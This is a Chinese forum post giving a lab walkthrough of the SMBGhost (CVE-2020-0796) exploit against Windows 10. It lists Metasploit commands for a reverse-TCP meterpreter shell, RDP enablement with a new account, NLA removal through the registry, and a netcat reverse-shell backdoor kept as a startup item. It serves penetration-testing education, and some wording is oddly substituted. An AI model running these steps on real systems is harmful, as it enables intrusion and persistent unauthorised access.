掌握安全渗透测试:利用永恒之黑漏洞获取Windows 10体系访问权限 ...

鼠扑  金牌会员 | 2024-7-28 20:01:20 | 显示全部楼层 | 阅读模式
打印 上一主题 下一主题

主题 922|帖子 922|积分 2766

以下是利用永恒之黑漏洞对Windows 10举行渗透测试的步骤:
环境介绍



  • 靶机:IP地址为192.168.1.60,运行Windows 10 1903版本。
  • 攻击机:IP地址为192.168.1.53。
靶机准备


  • 检查Windows 10版本号:确保靶机运行的Windows 10版本受到永恒之黑漏洞(CVE-2020-0796 SMBGhost)的影响。
  • 检查体系补丁:确认靶机未安装补丁KB4551762,该补丁修复了永恒之黑漏洞。
  • 开启445端口:确保靶机的445端口(SMB协议)是开放的。
获取Shell


  • 利用Metasploit框架

    • 启动Metasploit:msfconsole。
    • 利用永恒之黑漏洞模块:use exploit/windows/smb/cve_2020_0796_smbghost。

  • 设置选项

    • 显示模块选项:show options。
    • 设置目标主机IP:set RHOSTS 192.168.1.60。
    • 设置payload:set payload windows/x64/meterpreter/reverse_tcp。
    • 设置攻击机监听IP:set LHOST 192.168.1.53。
    • 禁用模仿模式:set DefangedMode false。

  • 执行exploit

    • 运行exploit:exploit。

创建新用户并开启远程桌面


  • 开启RDP远程桌面

    • 利用Metasploit的post/windows/manage/enable_rdp模块开启RDP服务,并创建新用户。

  • 创建RDP用户

    • 设置用户名和密码:set username xuegod 和 set password 123456。
    • 指定会话ID:set session 1。
    • 运行模块:run。

  • 检查NLA设置

    • 查询注册表以确定是否开启网络级身份验证(NLA)。

  • 关闭NLA(假如开启):

    • 修改注册表值SecurityLayer和UserAuthentication为0,以允许非NLA的RDP毗连。

  • 毗连远程桌面

    • 在Kali上利用rdesktop下令毗连到靶机的远程桌面:rdesktop 192.168.1.60。

开启后门维持权限访问


  • 配置后门程序

    • 上传nc(Netcat)到Windows 10体系。
    • 修改注册表添加启动项,以便在体系启动时执行nc反弹shell下令。

  • 设置防火墙规则

    • 允许443端口的网络访问,以使后门有效。

  • 重启Windows 10

    • 重启靶机以应用更改,并等待后门程序运行。

  • 毗连后门

    • 在Kali上利用nc下令毗连后门:nc -v 192.168.1.60 443。

  • MSF控制台毗连(可选):

    • 在Metasploit框架中利用connect下令毗连到后门:connect 192.168.1.60 443。

总结



  • 文档提供了利用永恒之黑漏洞对Windows 10举行渗透的具体步骤,包括获取初始访问、创建远程桌面用户、开启后门以及维持权限访问。
请注意,这些步骤仅供教诲目标,实际操作应在授权的渗透测试和安全研究环境中举行。未经授权的渗透测试大概违反法律。

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

鼠扑

金牌会员
这个人很懒什么都没写!
快速回复 返回顶部 返回列表